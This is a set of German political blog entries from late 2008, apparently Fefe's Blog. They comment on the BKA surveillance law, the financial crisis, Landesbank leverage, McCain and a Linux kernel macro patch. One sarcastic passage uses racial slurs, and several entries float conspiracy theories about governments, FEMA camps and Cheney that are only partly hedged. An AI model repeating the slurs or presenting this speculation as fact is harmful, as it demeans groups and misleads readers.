[l] Nachschlag hierzu: In einem famosen Beispiel für spontanen Internet-Humor haben ein paar Geeks spontan ein Brecheisen, eine Facehugger-Alienmaske zum Üben und einen Half Life Strategy Guide an das CERN geschickt. Und: jetzt sind sie angekommen und der Gordon Freemen Look-Alike-Typ da am CERN hat damit gleich ein paar nette Fotos gemacht und online gestellt. Hach. Wunderbar. Wir sind gerettet.
[l] Der Bundesrat will das BKA-Ermächtigungsgesetz nicht durchwinken? Na, was machen wir da. Erschiessen? Nee, das ist immer so eine Sauerei. Überwachen? Haben wir an die Telekom outgesourced. Einknasten? Die haben leider Immunität. Mhh. Mhh. Hey, ich hab's! Wir fordern einfach, dass die Abstimmungsregeln im Bundesrat geändert werden!
Dieser Schäuble ist so derartig weggetreten, da gibt es keine Worte mehr für. Der ist genau wie Bush, fühlt sich auf einer Mission Gottes, und der macht sich die Welt, wiedewiedewie sie ihm gefällt. Krasse Scheisse. Sehr schön auch die Süddeutsche-Schlagzeile: "Was nicht passt, wird passend gemacht" :-)
Oh ein interessantes Detail noch (auch wenn ich das als Nichtjurist sicher völlig fehlinterpretiere): die Immunität von Abgeordneten schützt vor Strafverfolgung. Nicht vor den neuen BKA-Ermächtigungsklauseln. Wenn das BKA-Gesetz also durch ist, kann der Schäuble gegen Leute, die seine Fascho-Gesetze nicht mit tragen wollen, die gesamte Präventiv-Waffenkammer des BKA einsetzen, z.B. einen Platzverweis für das Parlament erteilen oder in Präventivhaft nehmen. Daher ist er jetzt auch so nervös, dass das doch noch kippt. Danach kann er endlich seinen Terrorstaat hochfahren.
Update: Mitglieder des Bundesrats besitzen keine Immunität, aber von schnöden Fakten lasse ich mir doch keine Verschwörungstheorie kaputt machen!1!!

Thu Nov 20 2008

[l] Die Meldung ist so bizarr, da komme ich nicht dran vorbei. Also es gibt da in Südtexas einen Bezirk namens Willacy County, wo der Staatsanwalt ein Streithammel ist und gerade Cheney und Gonzales angeklagt hat. So weit so gut, fand ich jetzt lustig aber nicht SOOO lustig. Aber jetzt kommt der bizarre Teil: der Mann ist verschwunden und erschien nicht vor Gericht. Nanu? Hat Cheney sich da Sorgen gemacht und mal ein paar Kumpels angerufen?
[l] Schon unter Schröder/Eichel haben die Banken und die Regierung über Bailout-Konzepte nachgedacht. Eines davon wird euch bekannt vorkommen:
Nach Informationen des Handelsblatts schlug der Vorstandssprecher der Deutschen Bank, Josef Ackermann, in der hochrangigen Runde die Gründung einer Auffanggesellschaft vor.Diese Kreditwerkstatt wird auch als Bad Bank bezeichnet und soll dazu dienen, die Kredite Not leidender Banken zu bündeln, als Wertpapier zu verpacken und wieder zu verkaufen. Zur Entlastung solle der Staat für die Risiken einstehen und eine Garantie abgeben, hieß es weiter.
Das ist EXAKT was die Zocker-Verbrecher mit den Junk-Hypotheken gemacht haben, und was ich hier immer gerne als Portfolio-Klärschlamm bezeichnet habe. Von wegen auf sowas kommen nur die Amis. (Danke, Robin)

Tue Nov 18 2008

[l] Die Somalia-Piraten haben erstmalig einen Öl-Supertanker gekapert, mit Öl für 100 Mio Dollar an Bord. Daneben steht die US-Marine und Kriegsschiffe der NATO, aber keiner hilft. Bizarr? Naja, das Öl kommt von den Saudis, und gehört einer saudischen Reederei. Das ist jetzt also der perfekte Hebel, im Gegenzug von den Saudis Dinge zu erpressen. Und da haben die Amis ja schon länger drauf gewartet. Die Amis haben zwar auch sonst einen guten Hebel gegen die Saudis, aber die haben halt auch zunehmend Alleingänge gemacht, haben mehr oder weniger offen eine Atombombe von dem pakistanischen Khan-Netzwerk gekauft. Vielleicht lassen die Amis die jetzt deshalb erst mal auflaufen, um zu zeigen, wer hier der Chef ist.

Sun Nov 16 2008

[l] Die Linkspartei hat offenbar den Heilmann zurückgepfiffen. Zu spät. Das Makel kriegen die so schnell nicht wieder weg. Zensurpartei, elende.
Vor allem beharrt der immer noch auf seinem Recht, obwohl er da den falschen abgeklemmt hat. Manche Menschen sind echt beratungsresistent. Und RAUS aus dem Bundestag mit dem, das geht ja gar nicht.
Update: das ehemalige Nachrichtenmagazin aus Hamburg basht fröhlich mit und nutzt die Gelegenheit für ordentliche Agitprop. Warum müssen die nur immer gleich so hysterisch werden beim Spiegel? Naja, jedenfalls: sie behaupten, er habe die Landesmitgliederversammlung nicht informiert über seine Stasi-Karriere, hätte es aber tun müssen laut PDS-Beschlüssen von 1991 und 1993. Der Bruch in der Linkspartei ist offenbar ziemlich genau zwischen WASG und PDS. Es gab sogar einen Misstrauensantrag, 47 dagegen, 42 dafür, eine Enthaltung. Und der Spiegel zitiert aus seiner Kaderakte:
Das Motiv des Kandidaten zur Bereitschaft eines Dienstes im MfS liegt in seiner bisherigen positiven politischen Entwicklung zugrunde, indem er selbst einen aktiven Beitrag zum Schutz unseres Staates leisten möchte. Der Kandidat ist sich der persönlichen und familiären Konsequenzen eines solchen Berufes bewußt.
Dem ist wohl nichts hinzuzufügen.
Oh und die Morgenpost schreibt, dass der Personenschutz des MfS eben nicht nur Personenschutz gemacht haben soll sondern auch gegen Oppositionelle im Einsatz gewesen sein soll.
Angeblich war diese "Stalin-Party" Geschichte hier der Auslöser für innerparteiliche Streitereien, und ich vermute mal, wenn Heise schreibt, er habe drei Leute angezeigt, darunter einen Wikipedia-Autoren, dass da tatsächlich was anderes hinter steckt als Wikipedia. Diese Sex-Shop-Geschichte war dann wohl die Retourkutsche einer schmierigen Provinzposse. Wie im Affenkäfig im Zoo, alle bewerfen sich gegenseitig mit Scheisse. Ganz toll, liebe Linkspartei. Warum schafft ihr euch nicht gleich ab? Oder glaubt jetzt ernsthaft jemand von euch, er habe "gewonnen"?

Thu Nov 13 2008

[l] Die Yes Men haben mal wieder eine großartige Aktion gemacht. Yes Men verteilen 1,2 Millionen Fake New York Times "Extraausgaben" in New York, Los Angeles, San Francisco, Chicago, Philadelphia und Washington. Die Ausgabe ist datiert auf den 4th of July 2009, also den Nationalfeiertag, und hat Nachrichten wie "Bush wegen Hochverrats angeklagt", "Voting Machine Standards Implemented", eine Fake-Werbung von Monsanto, die angeblich statt Pestiziden Marienkäfer gegen Ungeziefer verkaufen. Und die Wirtschaftssparte schreibt, die Harvard Business School habe zugemacht, weil die Jugend die Welt jetzt verbessern wolle, anstatt maximale Profite zu extrahieren. Dann gibt es da einen Rückruf auf Benzin-Autos, man möge auf Elektroautos umsteigen. Und eine lange Liste von angeblichen Korrekturen ihrer eigenen Fehlverhaltens. Sehr, sehr schöne Sache. Beim Spiegel gibt es das PDF zum Runterladen.
[l] Lacher des Tages (der einem leider wegen des Anlasses des BKA-Ermächtigungsgesetzes im Halse stecken bleibt): Schäuble mahnt Ende unserer Diffamierungskampagne an.
Auch Bundesinnenminister Wolfgang Schäuble mahnte ein Ende von Kampagnen an, "unseren freiheitlichen Verfassungsstaat in einer Weise zu diffamieren, dass es bei jungen Leuten so ankommt, als sei es die Stasi".
Aha, so ist das. Meine infame Diffamierungskampagne ist also Schuld, dass die jungen Leute SSchäubles Repressions- und Schnüffelstaat mit anderen Repressions- und Schnüffelstaaten in einer Linie sehen? Danke, Herr Schäuble. Dann habe ich ja doch was richtig gemacht.
Und Schäuble ist nicht der einzige, der da voll ins Klo gegriffen hat. Bosbach lehnt Rücksichtnahme auf die ärztliche Schweigepflicht ab, weil es so viele Ärzte gibt.
Es könne nicht angehen, dass mehrere hunderttausend Bürger von der Auskunftspflicht ausgenommen werden: "Wir können es nicht zulassen, dass so viele Menschen ihr Wissen nicht weitergeben, auch wenn damit Menschenleben gerettet werden können", wird Bosbach von der Süddeutschen Zeitung zitiert.
Und mein Lieblings-Hassobjekt, der Herr Wiefelspütz, hat sich dann ernsthaft zu folgender Aussage hinreissen lassen:
Er habe zwar hohen Respekt vor der Arbeit der Mediziner, sehe aber ihre Rolle im Staatsgebilde als untergeordnet gegenüber der Arbeit von Abgeordneten und Strafverteidigern: "Das Parlament ist ein wenig wichtiger als ein Arzt."
Was für ein Widerling. Der Staat ist ganztägig damit beschäftigt, mir mein Geld abzunehmen, und die Ärzte sind ganztägig damit beschäftigt, Leben zu retten. Da ist man ja direkt versucht, dem Wiefelspütz eine fette Krankheit an den Hals zu wünschen, nur um mal zu sehen, ob er seine Meinung dann revidiert.

Tue Nov 11 2008

[l] Ein schwarzer Tag für Deutschland: Innenausschuss des Bundestags segnet Bundestrojaner ab. Früher hiess es immer, die Entscheidungen werden in den Ausschüssen getroffen, danach kommt nur noch Fraktionszwang und keiner macht sich auch nur die Mühe, sich so ein Gesetz mal vor dem Abstimmen anzugucken. Aber seit ich mal in so einem Ausschuss sass, kann ich euch sagen: die Ausschüsse sind auch nur Makulatur. Keine Ahnung, wo die Gesetze gemacht werden, aber es ist nicht das Parlament und nicht die Ausschüsse. Wahrscheinlich im Saunaclub oder bei der Thaimassage mit Lobbyisten. Tolle Demokratur haben wir da. Wozu wählen wir eigentlich?

Sat Nov 1 2008

[l] Die weltweite Frachtschifffahrt kommt zum Erliegen.
The Baltic Dry Index measuring rates for coal, iron ore, and grains, and other dry goods plummeted below 1000 yesterday, down 92pc since peaking in June.
The daily rental rates for Capesize big ships have dropped $234,000 to $7,340 in weeks, leaving operators stuck with heavy losses on long leases. Empty ships are now crowding Singapore and other global ports.
"It is extremely serious, " said Jeremy Penn, president of the Baltic Exchange. "Freight rates have never fallen this steeply before. It is telling us that world trade in raw materials has slowed dramatically. Shippers are having genuine difficulty obtaining letters of credit from banks," he said.
In britischen Publikationen heisst "92pc" "92%".
Schlimm genug, aber der Oberbrüller ist, dass sie jetzt alle Angst vor dem Weltwährungsfonds haben. Der Hintergrund ist, dass sie ja gerade alle Bailout-Kohle vom IMF haben wollen. Und der (und die Weltbank) sind ja auch dafür da. Nur haben die traditionell eben alle Länder unangespitzt in den Boden gerammt, die von ihnen Geld wollten, indem sie ihnen groteske Vorschriften gemacht haben, die ihre Wirtschaft komplett irreparabel plattgemacht haben. Südamerika, Afrika, Asien, die haben wir alle klein gehalten über diese Regeln. Und jetzt haben die ganzen westlichen Finanzpleitiers Angst, dass sie als Bittsteller auch zum Vernichten ihrer Wirtschaft gezwungen werden, wenn sie Kredit wollen. Großartige Ironie. Das werden uns diverse frühere Opfer des IMF gerade wärmstens an den Hals wünschen, denke ich.
The draconian terms raise fears that the IMF will apply the same medicine to Hungary, Ukraine, Belarus, Serbia, as well as Pakistan and a long list of other countries that may soon need a bail-out. Critics says the Fund risks repeating errors it made in Asia's 1998 crisis when it imposed a one-size-fits-all contraction policy on the region, causing bitter anti-Western feelings and arguably making matters worse.
A deflationary strategy of this kind could prove counterproductive –or worse – if applied in enough countries simultaneously. It would defeat a key purpose of the rescues, which is to stabilise the global financial system.
Na wo kämen wir da hin, wenn wir an westliche Länder die gleichen Anforderungen stellen wie an die Neger und die Schlitzaugen!1!! Sollen sie doch Kuchen essen!
[l] Die USA sind ja eines der wenigen Länder auf der Welt, in denen noch "Zweifel" daran besteht, ob die Welt gerade an globaler Erwärung stirbt oder nicht.
Die gute Nachricht: NASA hat einen 100-Millionen-Dollar Satelliten gebaut, der das messen kann und damit ein für alle Mal klären würde.
Die schlechte Nachricht: der liegt da seit 8 Jahren (!) in einem Lagerhaus rum und staubt ein.
Die gute Nachricht: Aktivisten haben Druck gemacht, jetzt hat NASA eine Frist, zu erklären, wieso die den nicht launchen.
Die schlechte Nachricht: NASA launcht den jetzt, um der Deadline zu entgehen, aber entfernt alle Instrumente, die in Richtung Erde zeigen.
Nicht zu fassen.

Thu Oct 30 2008

[l] Der Economist über die Asienkrise.
Banks are also hoarding their cash, aware how precious it is. Risk, too, is being repriced, even in areas as supposedly safe as trade credit.
That is where Asian companies are most vulnerable. Instead of relying on broad capital markets as is common in American and Europe, they seek credit in more traditional ways: bank loans, the sale of discounted receivables, and letters of credit. One trading company based in China says the collateral required for a letter of credit—typically a safe kind of loan because it involves merely delivering something to a customer—has jumped from 25% to 50% of the stated amount. An odd beneficiary of this squeeze has been the dollar, since orders are increasingly being settled in cash.
Lasst euch das mal auf der Zunge zergehen! Die lassen da Leute mit Geldkoffern rumlaufen, weil die Banken zu viel Ärger machen mit dem Letter of Credit. Unglaublich.
Und so langsam kommen wir ja in meiner Lieblings-Verschwörungsecke an. Wir sind ja immer schnell bei der Annahme, dass die Regierungen halt alle inkompetent sind und nichts auf die Reihe kriegen, aber die Verschwörungs-Gegenthese ist ja, dass das alles im Gegenteil genau so läuft, wie die das geplant haben. Wenn die Leute jetzt nämlich in großem Stil auf Bargeld im Koffer umsteigen, dann gehen den Juntas ja ihre Steuern flöten. Daher haben sie vor Jahren, als sie das kommen sahen, die ganzen Geldwäsche-Gesetze gemacht, die es vergleichsweise schwierig machen, international größere Bargeldmengen zu bewegen.
Oder auch der Schäuble passt da rein. In der Verschwörungstheorie ist das so, dass die Herren gesehen haben, dass ihnen bald das Weltwirtschaftssystem um die Ohren fliegt, plus Peak Oil, plus hohe Rohstoffpreise, plus Demographie, plus explodierender Schuldenberg des Staates, plus explodierende Kosten im Gesundheitssystem, … das ist ja alles seit vielen Jahren absehbar, dass wir da auf einem Sprengsatz sitzen.
Die Verschwörungstheorie sagt jetzt, der Schäuble macht die ganzen Reichssicherheitshauptamt-Gesetze gerade, damit sie vorgesorgt haben für den Moment, wo die Unruhen im Volk losgehen. Bei den doofen Deutschen ist das ja immer ein bisschen später als bei den anderen, die Amerikaner mussten daher früher vorbeugen. Ich weiss nicht, ob ihr davon gehört habt, aber die Amis haben über FEMA (ausgerechnet, das ist deren Katastrophenschutzbehörde, die bei New Orleans so grossartige Arbeit geleistet hat) lauter Gefängnis-Camps überall im Land bauen lassen. Die US-Verschwörungstheoretiker nennen die Concentration Camps, so weit würde ich da nicht gehen, aber die Frage stellt sich ja schon: wozu braucht die Regierung Lager, in denen sie ein paar Millionen Menschen einsperren könnten?
Nun, ohne mich da jetzt unter die Ufologen und Tinfoil-Hat-Konspirologen zu begeben: ich finde, da muss man ernsthaft drüber nachdenken, ob das vielleicht so ist. Es ist ja schon ziemlich unwahrscheinlich, dass die Regierungen alle überhaupt nicht mitkriegen, wie wir auf die Katastrophe zuschlittern. Und inzwischen sind wir ja bei einem Punkt, wo mehr oder weniger klar ist, dass wir da nicht mehr raus kommen. Und in Situationen, wo wir eh verloren haben, haben die Regierungen ja schon immer Atombunker für sich gebaut, in denen sie dann im Ernstfall zwischen verstrahlten Leichenbergen ausserhalb ein paar Wochen vor sich hin vegetiert hätten. Und vielleicht stimmt es ja, vielleicht haben die für das Szenario mit dem tobenden Mob auf der Strasse auch einen Plan, und der sieht dann eben Totalüberwachung und Schäuble-Polizeistaat vor. Und Passagierflugzeuge abschiessen. Und Militäreinsatz im Inneren.
Tja. Stoff zum Nachdenken an langen Winternächten. Ich hoffe ja, dass das alles spinnerte Verschwörungstheorien sind.

Tue Oct 28 2008

[l] Die Schweiz macht sich Sorgen, dass der Steinbrück den BND auf die Schweizer Kontodaten ansetzt, nachdem Steinbrück im Fernsehen mit der folgenden Formulierung ins Klo gegriffen hat:
Steinbrück bezeichnet das Schweizer Steuerregime als Angriff auf die Souveränität Deutschlands. Den Eidgenossen werde dasselbe widerfahren wie Liechtenstein, wenn das Land nicht zu einer Kooperation bereit sei.
Wie kann dieser Mann eigentlich noch im Amt sein? Hat der noch nicht genug kaputt gemacht? Wieso muss der nicht wegen der Bankenkrise zurück treten? Worauf warten wir, dass er noch jemandem den Krieg erklärt?
[l] Wisst ihr, wer vorhin (kurzzeitig) Exxon Mobil als wertvollste Firma der Welt überholt hat? VW. Bwahahaha. Was für eine Farce diese Börsen doch sind.
Wie kam es zu dem starken Anstieg? Nun, die Autobranche ist ja gerade am Runtergehen. Also haben die ganzen Spekulanten mit den Autokonzernen Leerverkäufe gemacht. Dann kam Porsche mit einer guten Nachricht und die VW-Aktie wurde spontan und unerwartet mehr Wert. Da schlugen die ganzen Stop-Loss Order der Leerverkäufer zu und haben gekauft, was den Preis höher trieb. Das war die erste Explosion. Jetzt haben wir lauter Spekulanten, die noch ein Stück mitreiten wollen, bevor der Aktienkurs wieder wegbricht.
Captain Obvious schreibt den Spiegel-Kommentar: "Experten warnen vor gefährlicher VW-Blase"
Update: Und wer waren diese Spekulanten? Hedge Fonds. Und die haben dabei fast 15 Milliarden verloren. Oooooooooh wie mich das mit Mitleid und Trauer erfüllt, die armen Hedgefonds.
Update: Und Societe Generale auch, da fiel erst mal der Aktienkurs um 16%. Wir erinnern uns, das waren die mit dem Visual Basic Hacker. Deren Investment-Strategien überzeugten noch nie so richtig. :-)

Mon Oct 27 2008

[l] Der DAX ist heute um 9% eingebrochen. Also wäre er. Wenn nicht die VW-Aktie einen Kurssprung um zeitweilig mehr als 200% nach oben gemacht hätte, weil Porsche seinen Anteil bei VW vergrößert hat. Dank dieser einen Aktie hat der DAX jetzt sogar leicht im Plus geschlossen. Was für ein Casino-Bullshit.

Thu Oct 23 2008

[l] Liebe Leser, heute möchte ich etwas ungewöhnliches tun. Ich möchte Ackermann loben. Nicht nur loben! Der Mann ist im Moment mein Held!
Ich will das mal ausführen. Ackermann hat zwei Dinge getan: er hat gesagt, seine Bank brauche den Rettungsfonds nicht, und er hat freiwillig sein Gehalt gesenkt (also eigentlich auf seinen Bonus verzichtet, aber kommt ja aufs Gleiche raus).
Mit der Ansage, sie brauchen keinen Bail-Out, haben sie die Idee etabliert, dass es anrüchig ist, sich aus dem Rettungspott zu bedienen. Jetzt traut sich keine andere Bank, das zu machen, weil das ja aussieht, als hätten sie keine Wahl und stünden mit dem Rücken zur Wand. Das normale Verhalten der Banken, sich da auch zu bedienen, wenn sie gar nicht wirklich pleite sind, ist damit verhindert.
Die Mainstream-Meinung ist, dass die Banken nicht zum Rettungstopf greifen, weil die Manager dann ihr Gehalt senken müssten. Das stimmt nicht. Die Manager können auf ihre Verträge pochen. Die bleiben ja weiter gültig. Und solange kein Manager auf sein Gehalt verzichtet, haben sie auch nicht das Problem, wie ein gieriges beratungsresistentes Arschloch auszusehen. Womit wir zu Ackermanns Bonusverzicht kommen. Der ist zwar angesichts der Zahlen der Deutschen Bank eh weitgehend Kosmetik, aber er nimmt den anderen Managern jetzt die Möglichkeit, öffentlich nicht auf ihre Boni zu verzichten. Das kann ja niemand machen jetzt, da kämen ja die Lynchmobs und die Merkel mit einer Mistgabel an der Spitze. Zumal der Ackermann ja verzichtet, obwohl er das Image aufgebaut hat, der Deutschen Bank ginge es gut.
Insofern hat Ackermann uns gerade VIEL Geld gespart. Und ich bin ihm dankbar.
Das hat der Ackermann natürlich nicht gemacht, weil er so ein Freund der Steuerzahler ist. Das ist auch für die Deutsche Bank eine gute Strategie. Denn er hat damit der Konkurrenz den Rettungsanker aus der Hand geschlagen, die müssen jetzt (zu viel schlechteren Konditionen!) anderswo Kohle auftun. Oder sie müssen hilflos zugucken, wie ihre Bank kaputt geht und am Ende doch auf den Rettungstopf zugreifen, wenn sie wirklich mit dem Rücken zur Wand stehen, und dann haben sie auch keinen Hebel mehr, um die Gehaltssenkung abzulehnen.
In diesem Sinne: Herr Ackermann, Sie rocken! Vielleicht gibt es ja doch sowas wie eine unsichtbare Hand des Marktes, und sie wirkt gerade durch Ackermann :-)
Volkswirtschaftlich ist das natürlich eine Katastrophe, wenn wir die Banken nicht jetzt retten, sondern erst wenn nur noch die termitenzerfressenen Holzwände stehen. Aber ich persönlich finde das gut. Das haben die verdient.
Ich persönlich vermute, dass wir in der nächsten Zeit viele hochzinsige Konten bei deutschen Banken im Angebot haben werden, und tolle Angebote für Neukunden. Und weil am Ende der Staat verhindern wird, dass die Kohle einfach weg ist, sollte es auch ziemlich sicher sein, da jetzt im Wochentakt zu dem mit den besten Konditionen umzuziehen. Wir zahlen eh dafür am Ende, also können wir wenigstens dafür sorgen, dass ein bisschen was von dem Geld bei uns bleibt.
[l] Bankendomino: die LBBW sind die nächsten, die haben einen unglaublichen Hebel von 57,8 zwischen Eigenkapital und Fremdkapital. Das ist weit mehr als z.B. Lehman Brothers (21,1) hatten. Die haben alleine an CDO mehr Klärschlamm im Portfolio, als sie Eigenkapital haben. Das ist eine unverantwortliche Zockerei und ich bin beschämt, dass ausgerechnet die Sparkassen da jetzt beim Finanzieren helfen sollen. Als ob die da etwas dafür könnten!
Und gleich danach kommt mit einem Hebel von 52,4 die WestLB. Bei einem Eigenkapital von ca 5 Milliarden Euro haben die über 90 Milliarden Euro an Posten, die sie selbst als Risikoposition bezeichnen. Wie kann denn sowas bitte passieren?! Mann Mann Mann. Die Größenordnung davon kann man überhaupt nur noch verstehen, wenn man es mit dem Bruttoinlandsprodukt der Bundesrepublik vergleicht:
Das nominale ausstehende Derivate-Portfolio der WestLB toppt alle anderen spekulativen Landesbanken. 105% des BIPs der Bundesrepublik Deutschland bzw. 2,542 Billionen Euro hält die WestLB an derivativen Finanzwetten, darunter ein Volumen an gefährlichen Kreditderivaten von 135,7 Mrd. Euro!
Sicher sind die Landesbanken nur ein Problem in der weltweiten Finanzkrise, dennoch kennzeichnen sie besonders das Versagen aller Kontrollinstanzen! Die 3 führenden Landesbanken Deutschlands halten ein Volumen von 5,9 Billionen Euro an ausstehenden Derivaten, das 4,98-fache ihrer Bilanzsumme bzw. 243,4% des deutschen BIPs.
Aber man kann denen gar nicht böse sein, denn sie haben aus ihrer Sicht genau das richtige gemacht. Wie die USA mit China. Wenn jemand mir 100 Euro schuldet, ist er der Doofe. Wenn jemand mir 100 Millionen Euro schuldet, bin ich der Doofe. Ab einer gewissen Größenordnung an Schulden können die für sich selbst nichts mehr schlimmer machen, wenn sie noch mehr Schulden aufnehmen. Also ist es spieletheoretisch für sie sinnvoll, mehr Schulden zu machen. Ist eh schon im Brunnen, das Kind, und solange es keiner merkt, kann man noch ein bisschen Spass haben damit.
Und dann gibt es noch Finanzprobleme bei … Gazprom. WTF? Gazprom?!? Die haben da offenbar angesichts ihres Gelddruckmaschine-Geschäftsmodells leichtherzig ihre Finanzen suboptimal gemanaged und haben jetzt Probleme, ihre Schulden zu refinanzieren. Und diese Meldung ist eine mittlere Katastrophe für Europa, denn wir holen ein Viertel unseres Erdgases von Gazprom, und wenn die kurzfristig Kohle brauchen, dann könnt ihr euch ja mal überlegen, wo sie die herholen, und wie sich das auf unsere Gaspreise auswirkt. Und wie das zeitlich wieder zum Winteranfang passt! Brilliant!
Und dann hat da noch Wachovia den größten Quartalsverlust einer Bank aller Zeiten gemacht: 24 Milliarden Dollar. (via)
[l] bei ZAF gibt es einen tollen Merkel-Photoshop zur Finanzkrise. Mit Sarkozy wäre es vermutlich noch witziger, aber der würde nicht so grenzdebil grinsen dabei :-)
Update: Au weia, da haben wir wohl ZAF plattgemacht. Hier ist eine lokale Kopie des Bildes. Ich bitte um Verzeihung!

Wed Oct 22 2008

[l] Großartiger Patch des Tages (kommt aus dem Linux-Kernel):
```
-#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define ARRAY_SIZE(arr) (sizeof(arr) / sizeof((arr)[0]) \
+ + sizeof(typeof(int[1 - 2*!!__builtin_types_compatible_p(typeof(arr), \
+ typeof(&arr[0]))]))*0)
```
Wer den auf Anhieb versteht, sollte sich direkt erschiessen, weil er zu viel C gemacht hat.
Für die anderen erkläre ich es kurz.
ARRAY_SIZE hat vorher die Anzahl der Elemente im Array zurück geliefert, und tut es auch danach. Man sieht, dass der Patch einen komplizierten Ausdruck *0 addiert, also immer Null.
Der einzige Sinn des komplizierten Ausdrucks ist, einen Compile-Zeit-Fehler zu produzieren, wenn __builtin_types_compatible_p 1 zurück liefert. Wenn da 0 rauskommt, macht er zweimal !, das logische NOT, d.h. wieder 0, mal 2 bleibt null, und er hat ein Array der Größe 1, das ist in Ordnung. Wenn da was anderes als 0 rauskommt, macht er zweimal !, d.h. 1, mal 2 ist 2, und damit ist die Arraygröße -1, d.h. negativ, und es ergibt einen Compile-Zeit-Fehler.
Anders formuliert: der Patch ändert das Makro so, dass es zur Compilezeit in die Luft fliegt, wenn man einen anderen Typen als ein Array übergibt, bei dem trotzdem [0] erlaubt ist, also mit anderen Worten einen Pointer.
Kleiner Insider-Joke: früher hat man das ohne 2* gemacht, da war es nämlich in C nicht erlaubt, ein Array mit Null Elementen zu deklarieren. Das hat sich kürzlich geändert, daher steht da jetzt 2*.
Wer das furchtbar findet, sollte von C++ weiträumig Abstand halten.
Der Autor des Hacks ist übrigens Rusty Russell, der u.a. an den module_init_tools und netfilter Verantwortung trägt.
Oh übrigens: __builtin_types_compatible_p ist eine gcc-Erfindung.
[l] Sarkozy: Bevor die Chinesen unsere maroden Betriebe mit unserem Geld kaufen, sollte lieber unsere Regierung unsere maroden Betriebe mit Geld kaufen, dass sie sich von uns leihen. Aaaaaha. Lustigerweise haben die Unternehmen ja Erfahrungen in China gemacht, und sooo viel Aufsicht durch den Staat gibt es da nicht, daher ist denen die China-Option lieber als dass da irgendwelche Beamten über die schwarzen Kassen stolpern.
[l] Wo wir gerade bei bizarren Justizsystemen sind… Russland entlässt den Vizefinanzminister aus der U-Haft, offenbar anlässlich eines Staatsbesuchs von Gaddafi, denn besagter Vizefinanzminister sass in Haft, weil sie seine Veruntreuung von größeren Summen im Aussenhandel mit Libyen untersucht haben.
Ein Mitarbeiter der russischen Holding Rostechnologii sagte, dass die unerwartete Entlassung Stortschaks mit dem bevorstehenden Besuch Gaddafis zu tun haben könnte; Stortschak sei derjenige gewesen, der die Frage der Schulden Libyens gegenüber Moskau betreute - die 4,4 Milliarden US-Dollar wurden abgeschrieben, im Gegenzug verpflichtete sich Tripolis zum Kauf russischer Waffensysteme und zu den anderen Geschäften mit Russland.
Äh, wie meinen? Da muss noch irgendwas im Hintergrund laufen, der Deal ergibt ja wohl gar keinen Sinn. Lacher am Rande:
„Im Fall Stortschak ist die Beweislage klar - es gibt keine Beweise. Um die Ermittlungsbehörden nicht zu erniedrigen, wird das Gericht wohl erklären, Herr Stortschak habe sich eines kleinen zweitrangigen Deliktes schuldig gemacht, und ihm dann eine eher symbolische Strafe anhängen - zum Beispiel eine Freiheitsstrafe in der Zeit, die er bereits im U-Haft verbrachte“, heißt es aus der russischen Staatsanwaltschaft.

Tue Oct 14 2008

[l] Die Amis wollen jetzt auch Bankanteile kaufen.
Nachdem die Europäer das vorgemacht haben. Nanu? Warum haben sie das nicht gleich gemacht?
Ich stelle mir ja immer den Paulson vor, den Ex-Chef von Goldman Sachs, der die Krise bisher als "ich kann die Konkurrenz plattmachen" gesehen hat, und der es jetzt als "ich kann die Konkurrenz besitzen" zu sehen beginnt.

Mon Oct 13 2008

[l] Der Rolling Stone über McCain. Und da bleibt kein Auge trocken. McCain war ein inkompetenter Versager, sein Leben lang, und hat nur im Militär Karriere gemacht, weil sein Vater und sein Opa Viersterne-Admirale waren. Insbesondere war er ein beschissener Pilot. Schlechter noch als Bush, wenn man dem Artikel glauben will. Außerdem ist er ein Säufer und Spieler (Crabs, ein Würfelspiel). Und seine Persönlichkeit läßt auch zu wünschen übrig:
Growing up, McCain attended Episcopal High School, an all-white, all-boys boarding school across the Potomac in Virginia, where tuition today tops $40,000 a year. There, McCain behaved with all the petulance his privilege allowed, earning the nicknames "Punk" and "McNasty." Even his friends seemed to dislike him, with one recalling him as "a mean little fucker." […]Midway though his final year, McCain faced expulsion, about to "bilge out" because of excessive demerits. After his mother intervened, however, the academy's commandant stepped in. Calling McCain "spoiled" to his face, he nonetheless issued a reprieve, scaling back the demerits. McCain dodged expulsion a second time by convincing another midshipman to take the fall after McCain was caught with contraband.
Contraband ist Schmuggelware, vermutlich Zigaretten oder sowas. Und als Pilot war er offenbar wirklich eine Offenbarung in Inkompetenz.
He was still in training, in Texas, when he crashed his first plane into Corpus Christi Bay during a routine practice landing. […]
McCain's thrill-seeking carried over into his day job. Flying over the south of Spain one day, he decided to deviate from his flight plan. Rocketing along mere feet above the ground, his plane sliced through a power line. His self-described "daredevil clowning" plunged much of the area into a blackout.
In seiner ganzen Karriere ist der nie durch Fähigkeiten vorwärts gekommen, sondern hat sich immer mit Beziehungen vorgemogelt. Wen würde man als Präsidenten haben wollen, wenn nicht so jemanden?
On October 25th, 1967, he bombed a pair of Soviet MiGs parked on an airfield outside Hanoi. His record was now even. Enemy planes destroyed by McCain: two. American planes destroyed by McCain: two.
Bwahahahaha, sehr schön :-)
Soon after McCain hit the ground in Hanoi, the code went out the window. "I'll give you military information if you will take me to the hospital," he later admitted pleading with his captors. McCain now insists the offer was a bluff, designed to fool the enemy into giving him medical treatment. In fact, his wounds were attended to only after the North Vietnamese discovered that his father was a Navy admiral. What has never been disclosed is the manner in which they found out: McCain told them. According to Dramesi, one of the few POWs who remained silent under years of torture, McCain tried to justify his behavior while they were still prisoners. "I had to tell them," he insisted to Dramesi, "or I would have died in bed."
Nachvollziehbar? Keine Frage. Aber ein Held ist was anderes. Später haben sie ihm die Freilassung angeboten, und McCain hat abgelehnt und das ist heute das Zentrum seiner Heldengeschichte.
What McCain glosses over is that accepting early release would have required him to make disloyal statements that would have violated the military's Code of Conduct. If he had done so, he could have risked court-martial and an ignominious end to his military career. "Many of us were given this offer," according to Butler, McCain's classmate who was also taken prisoner. "It meant speaking out against your country and lying about your treatment to the press. You had to 'admit' that the U.S. was criminal and that our treatment was 'lenient and humane.' So I, like numerous others, refused the offer."
Später hat er dann übrigens noch ein drittes Flugzeug gecrasht, aber offenbar nicht während eines Krieges.
Dann kümmert sich der Artikel noch um die ganzen schmierigen Lobbyisten- und Fundraising-Probleme, die Keating Five, die Drogenabhängigkeit seiner Frau und wie sie sich die Tabletten dann über eine Hilfsorganisation für die 3. Welt beschafft hat, … da bleibt kein gutes Haar übrig. Nicht, dass da vorher viele gewesen wären. Und am Ende steht die Beobachtung, dass er ein überzeugterer Neocon als Bush ist, und mindestens genau so ein Kriegstreiber.
